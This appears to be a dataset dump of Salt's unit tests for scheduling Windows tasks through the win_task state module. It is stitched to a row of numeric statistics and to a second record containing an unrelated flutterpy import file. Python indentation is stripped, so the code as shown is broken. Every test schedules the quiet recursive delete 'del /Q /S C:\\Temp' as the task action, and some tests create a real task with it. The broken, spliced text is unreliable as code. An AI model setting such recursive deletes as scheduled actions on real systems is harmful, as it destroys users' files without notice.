from __future__ import absolute_import, print_function, unicode_literals
# Import Salt Libs
import salt.modules.win_task
import salt.states.win_task as win_task
# Import Salt Testing Libs
import salt.utils.platform
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.mock import NO_MOCK, NO_MOCK_REASON, MagicMock, patch
from tests.support.unit import skipIf, TestCase
from tests.support.helpers import destructiveTest
@destructiveTest
@skipIf(NO_MOCK, NO_MOCK_REASON)
@skipIf(not salt.utils.platform.is_windows(), "Windows is required")
class WinTaskCase(TestCase, LoaderModuleMockMixin):
'''
Test cases for salt.states.win_task
'''
def setup_loader_modules(self):
return {win_task: {}}
def test_present(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'Once',
'start_date': '2019-05-14',
'start_time': '01:00 pm'}
ret = {'result': False}
try:
with patch.dict(win_task.__salt__, {'task.list_tasks': salt.modules.win_task.list_tasks,
'task.info': salt.modules.win_task.info,
'task.create_task': salt.modules.win_task.create_task}), \
patch.dict(win_task.__opts__, {"test": False}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
finally:
try:
salt.modules.win_task.delete_task(name='salt', location='')
finally:
pass
self.assertEqual(ret['result'], True)
def test_absent(self):
with patch.dict(win_task.__salt__, {'task.list_tasks': salt.modules.win_task.list_tasks,
'task.info': salt.modules.win_task.info,
'task.delete_task': salt.modules.win_task.delete_task}), \
patch.dict(win_task.__opts__, {"test": False}):
ret = win_task.absent('salt', '')
self.assertEqual(ret['result'], True)
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'Once',
'start_date': '2019-05-14',
'start_time': '01:00 pm'}
try:
with patch.dict(win_task.__salt__, {'task.list_tasks': salt.modules.win_task.list_tasks,
'task.info': salt.modules.win_task.info,
'task.create_task': salt.modules.win_task.create_task}), \
patch.dict(win_task.__opts__, {"test": False}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
win_task.present(name='salt', location='', force=True, **kwargs)
finally:
try:
with patch.dict(win_task.__salt__, {'task.list_tasks': salt.modules.win_task.list_tasks,
'task.info': salt.modules.win_task.info,
'task.delete_task': salt.modules.win_task.delete_task}), \
patch.dict(win_task.__opts__, {"test": False}):
ret = win_task.absent('salt', '')
finally:
pass
self.assertEqual(ret['result'], True)
@skipIf(NO_MOCK, NO_MOCK_REASON)
@skipIf(not salt.utils.platform.is_windows(), "Windows is required")
class WinTaskPrivateCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
return {win_task: {}}
def test__get_arguments(self):
kwargs = {'salt': True,
'cat': 'nice',
'idk': 404}
true_ret = {'salt': True,
'cat': 'nice',
'fat': True,
'idk': 404}
ret = win_task._get_arguments(kwargs,
['cat'],
{'nice': ['idk'],
'sad': ['why']},
{'fat': True,
'salt': None})
self.assertEqual(ret, true_ret)
def test__get_task_state_prediction(self):
state = {'task_found': True,
'location_valid': True,
'task_info': {'conditions': {'ac_only': True,
'run_if_idle': False,
'run_if_network': False,
'start_when_available': False},
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'triggers': [{'delay': False,
'execution_time_limit': '3 days',
'trigger_type': 'OnSessionChange',
'start_date': '2019-05-14', 'enabled': True,
'start_time': '13:00:00'}],
'settings': {'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days',
'allow_demand_start': True,
'restart_interval': False,
'stop_if_on_batteries': True,
'force_stop': True,
'wake_to_run': False}}}
task_info = {'conditions': {'ac_only': True,
'run_if_idle': False,
'run_if_network': False,
'start_when_available': False},
'trigger': {'end_date': None,
'execution_time_limit': '3 days',
'state_change': 'SessionUnlock', 'random_delay': False,
'end_time': '00:00:00',
'start_date': '2019-05-14',
'repeat_duration': None,
'start_time': '01:00 pm',
'repeat_interval': None,
'delay': False,
'trigger_enabled': True,
'trigger_type': 'OnSessionChange',
'repeat_stop_at_duration_end': False},
'action': {'start_in': '',
'cmd': 'del /Q /S C:\\\\Temp',
'arguments': '',
'action_type': 'Execute'},
'settings': {'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days',
'allow_demand_start': True,
'restart_interval': False,
'stop_if_on_batteries': True,
'force_stop': True,
'wake_to_run': False}}
prediction = win_task._get_task_state_prediction(state, task_info)
self.assertEqual(state, prediction)
@skipIf(NO_MOCK, NO_MOCK_REASON)
@skipIf(not salt.utils.platform.is_windows(), "Windows is required")
class WinTaskTriggersCase(TestCase, LoaderModuleMockMixin):
'''
The tests below just check whether the state prediction is correct.
Many of the tests look alike, but under the hood a lot of checks are happening.
The trigger tests do not cover the Once or Event trigger types.
'''
def setup_loader_modules(self):
return {win_task: {}}
def test_Daily(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'Daily',
'start_date': '2019-05-14',
'start_time': '01:00 pm',
'days_interval': 101}
info = {'triggers': [{'random_delay': False,
'trigger_type': 'Daily',
'execution_time_limit': '3 days',
'start_time': '13:00:00',
'enabled': True,
'start_date': '2019-05-14'}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'start_when_available': False,
'run_if_network': False,
'ac_only': True,
'run_if_idle': False},
'settings': {'wake_to_run': False,
'allow_demand_start': True,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days',
'force_stop': True,
'delete_after': False,
'stop_if_on_batteries': True,
'restart_interval': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_Weekly(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'Weekly',
'start_date': '2019-05-14',
'start_time': '01:00 pm',
'days_of_week': ['Monday', 'Wednesday', 'Friday'],
'weeks_interval': 1}
info = {'triggers': [{'start_date': '2019-05-14',
'execution_time_limit': '3 days',
'random_delay': False,
'enabled': True,
'start_time': '13:00:00',
'trigger_type': 'Weekly'}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'start_when_available': False,
'run_if_idle': False,
'run_if_network': False,
'ac_only': True},
'settings': {'allow_demand_start': True,
'wake_to_run': False,
'execution_time_limit': '3 days',
'force_stop': True,
'multiple_instances': 'No New Instance',
'stop_if_on_batteries': True,
'restart_interval': False,
'delete_after': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_Monthly(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'Monthly',
'start_date': '2019-05-14',
'start_time': '01:00 pm',
'months_of_year': ['January', 'July'],
'days_of_month': [6, 16, 26],
'last_day_of_month': True}
info = {'triggers': [{'start_date': '2019-05-14',
'random_delay': False,
'trigger_type': 'Monthly',
'execution_time_limit': '3 days',
'start_time': '13:00:00',
'enabled': True}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'run_if_idle': False,
'run_if_network': False,
'start_when_available': False,
'ac_only': True},
'settings': {'force_stop': True,
'allow_demand_start': True,
'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days', 'stop_if_on_batteries': True,
'restart_interval': False,
'wake_to_run': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_MonthlyDay(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'MonthlyDay',
'start_date': '2019-05-14',
'start_time': '01:00 pm',
'months_of_year': ['January', 'July'],
'weeks_of_month': ['First', 'Third'],
'last_week_of_month': True,
'days_of_week': ['Monday', 'Wednesday', 'Friday']}
info = {'triggers': [{'start_date': '2019-05-14',
'random_delay': False,
'trigger_type': 'MonthlyDay',
'execution_time_limit': '3 days',
'start_time': '13:00:00',
'enabled': True}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'run_if_idle': False,
'run_if_network': False,
'start_when_available': False,
'ac_only': True},
'settings': {'force_stop': True,
'allow_demand_start': True,
'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days', 'stop_if_on_batteries': True,
'restart_interval': False,
'wake_to_run': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_OnIdle(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'OnIdle',
'start_date': '2019-05-14',
'start_time': '01:00 pm'}
info = {'triggers': [{'start_date': '2019-05-14',
'random_delay': False,
'trigger_type': 'OnIdle',
'execution_time_limit': '3 days',
'start_time': '13:00:00',
'enabled': True}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'run_if_idle': False,
'run_if_network': False,
'start_when_available': False,
'ac_only': True},
'settings': {'force_stop': True,
'allow_demand_start': True,
'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days',
'stop_if_on_batteries': True,
'restart_interval': False,
'wake_to_run': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_OnTaskCreation(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'OnTaskCreation',
'start_date': '2019-05-14',
'start_time': '01:00 pm'}
info = {'triggers': [{'start_date': '2019-05-14',
'random_delay': False,
'trigger_type': 'OnTaskCreation',
'execution_time_limit': '3 days',
'start_time': '13:00:00',
'enabled': True}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'run_if_idle': False,
'run_if_network': False,
'start_when_available': False,
'ac_only': True},
'settings': {'force_stop': True,
'allow_demand_start': True,
'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days',
'stop_if_on_batteries': True,
'restart_interval': False,
'wake_to_run': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_OnBoot(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'OnBoot',
'start_date': '2019-05-14',
'start_time': '01:00 pm'}
info = {'triggers': [{'start_date': '2019-05-14',
'random_delay': False,
'trigger_type': 'OnBoot',
'execution_time_limit': '3 days',
'start_time': '13:00:00',
'enabled': True,
'delay': False}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'run_if_idle': False,
'run_if_network': False,
'start_when_available': False,
'ac_only': True},
'settings': {'force_stop': True,
'allow_demand_start': True,
'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days',
'stop_if_on_batteries': True,
'restart_interval': False,
'wake_to_run': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_OnLogon(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'OnLogon',
'start_date': '2019-05-14',
'start_time': '01:00 pm'}
info = {'triggers': [{'start_date': '2019-05-14',
'random_delay': False,
'trigger_type': 'OnLogon',
'execution_time_limit': '3 days',
'start_time': '13:00:00',
'enabled': True}],
'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'conditions': {'run_if_idle': False,
'run_if_network': False,
'start_when_available': False,
'ac_only': True},
'settings': {'force_stop': True,
'allow_demand_start': True,
'delete_after': False,
'multiple_instances': 'No New Instance',
'execution_time_limit': '3 days',
'stop_if_on_batteries': True,
'restart_interval': False,
'wake_to_run': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
def test_OnSessionChange(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'OnSessionChange',
'start_date': '2019-05-14',
'start_time': '01:00 pm',
'state_change': 'SessionUnlock'}
info = {'actions': [{'cmd': 'del /Q /S C:\\\\Temp',
'action_type': 'Execute'}],
'settings': {'delete_after': False,
'execution_time_limit': '3 days',
'wake_to_run': False,
'force_stop': True,
'multiple_instances': 'No New Instance',
'stop_if_on_batteries': True,
'restart_interval': False,
'allow_demand_start': True},
'triggers': [{'trigger_type': 'OnSessionChange',
'execution_time_limit': '3 days',
'delay': False,
'enabled': True,
'start_date': '2019-05-14',
'start_time': '13:00:00'}],
'conditions': {'run_if_idle': False,
'ac_only': True,
'run_if_network': False,
'start_when_available': False}}
with patch.dict(win_task.__salt__, {'task.list_tasks': MagicMock(side_effect=[['salt']] * 2),
'task.info': MagicMock(side_effect=[info])}), \
patch.dict(win_task.__opts__, {"test": True}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
self.assertEqual(ret['result'], True)
| 50.275591 | 110 | 0.434064 | 2,267 | 25,540 | 4.583591 | 0.09528 | 0.048504 | 0.042729 | 0.056972 | 0.827928 | 0.800885 | 0.783659 | 0.757194 | 0.735733 | 0.735733 | 0 | 0.025347 | 0.433085 | 25,540 | 507 | 111 | 50.374753 | 0.692313 | 0.014213 | 0 | 0.817352 | 0 | 0 | 0.257291 | 0.001074 | 0 | 0 | 0 | 0 | 0.031963 | 1 | 0.03653 | false | 0.004566 | 0.018265 | 0.006849 | 0.068493 | 0.002283 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a013d9fe2c26067a978f834f6b4738e5e7d0639b | 169 | py | Python | flutterpy/derivatives/__init__.py | mtnzguillermo/windflupy | fb25c349d5fb392a69a3e8b3fb29073bc8f62640 | [
"BSD-3-Clause"
] | 1 | 2021-03-05T10:58:00.000Z | 2021-03-05T10:58:00.000Z | flutterpy/derivatives/__init__.py | mtnzguillermo/windflupy | fb25c349d5fb392a69a3e8b3fb29073bc8f62640 | [
"BSD-3-Clause"
] | null | null | null | flutterpy/derivatives/__init__.py | mtnzguillermo/windflupy | fb25c349d5fb392a69a3e8b3fb29073bc8f62640 | [
"BSD-3-Clause"
] | null | null | null |
from flutterpy.derivatives.flutter_derivatives import *
from flutterpy.derivatives.independent_functions import *
from flutterpy.derivatives.notations.notation import * | 42.25 | 57 | 0.869822 | 18 | 169 | 8.055556 | 0.5 | 0.268966 | 0.496552 | 0.413793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071006 | 169 | 4 | 58 | 42.25 | 0.923567 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |